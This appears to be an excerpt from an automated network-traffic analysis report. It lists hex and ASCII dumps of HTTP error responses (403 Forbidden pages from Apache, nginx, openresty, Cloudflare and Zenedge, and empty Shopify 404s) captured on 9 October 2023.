                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:28 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 06f94af30090e5e41403fff9e223a7ee33f0062dCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Mon, 09 Oct 2023 13:50:29 GMTX-Cache-Status: Server: ZENEDGEData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 37 37 22 2c 20 31 36 39 36 38 35 39 34 31 37 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 36 38 35 39 34 31 37 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 31 35 36 37 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 39 20 4f 63 74 20 32 30 32 33 20 31 33 3a 35 32 3a 32 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4777", 1696859417, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1696859417 * 3.1415926535898; v = Math.floor(v); do
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 92970472-6497-4c7e-ad76-97ca94ad928bCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxQpavzu%2B0KYAq%2FvxEYbx1DSTnboH4%2FlTY5WhsAd6TJg0hrpPUNCtpiA9pctSD7Yjp5rmTZgNcdjIo%2BctwZKprxR%2FxHkpM8Y6IH5KCdhwXkle2IfL7qSghaQvs%2BEX1cv8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=87.000132Server: cloudflareCF-RAY: 813717cb0c627d17-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:29 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hYA%2Fd1cteK7zPcDYVwCvPdB5OuNTHuPfsumhU%2BMVTFmp3AdDXR6Sp8K6buK2wOBz%2FkonvokbMlhLHQaNVX%2F8HUgDLjqdxJZrTfUpX36Awo7UA6KJnpUVQ6PECc11Yb%2FD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813717cbefd70d08-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:29 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ruBDPgXjJmLWCqUr9895h6fpdgFtaRNQ5NRNudANHTs0NVtSaE6TdfNCZv35WNgoF6saxFlIb0%2FlIPS1HHSlVX14G8L%2FDZ%2FWfhDvmTBAi%2BbrmzHTDQR2Wiz4eiBcy2hK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813717cd28870d08-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:50:30 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:50:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIh6vui5MiU7mP0yT2W75sjUfyzGET83TqpckhQevg0EemSR0zjpNub0nOvbXkY02%2BXO4Eq19ojbYY%2FgOscZWFbIMOOevuhaOeC0M5zI0c59WvsSWi01EYuiPSZQFGE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813717d7da4e7c5b-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:38 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:38 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: f59647d7-c73d-4170-817a-08ed16d8c0bbCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cZ3C4Q67soV7tNWrD4dnPBo16OWVc8L4DXyUgJfoZ6ZUKoNqET0soBY%2F7MEodLZFZ0mi0eYIlkeBG7RUancLCImWHiwnyR3zwNOXj2VbQVY6bIwRreW8DeHnkx%2FEiqs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=88.999987Server: cloudflareCF-RAY: 8137182b0be42acf-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:45 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:45 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: Qizr2MOzfO8jjTBKBVmOj6nPWIDxfKj16yM6xXYJ3IE=,m0j2EEknGIVUW/liY8BLLjYvXQYrV/LrhbkNY01ADWAG/hKs8AeY1T4OIbgnD+yxX-Wix-Request-Id: 1696859453.228316757933815518X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
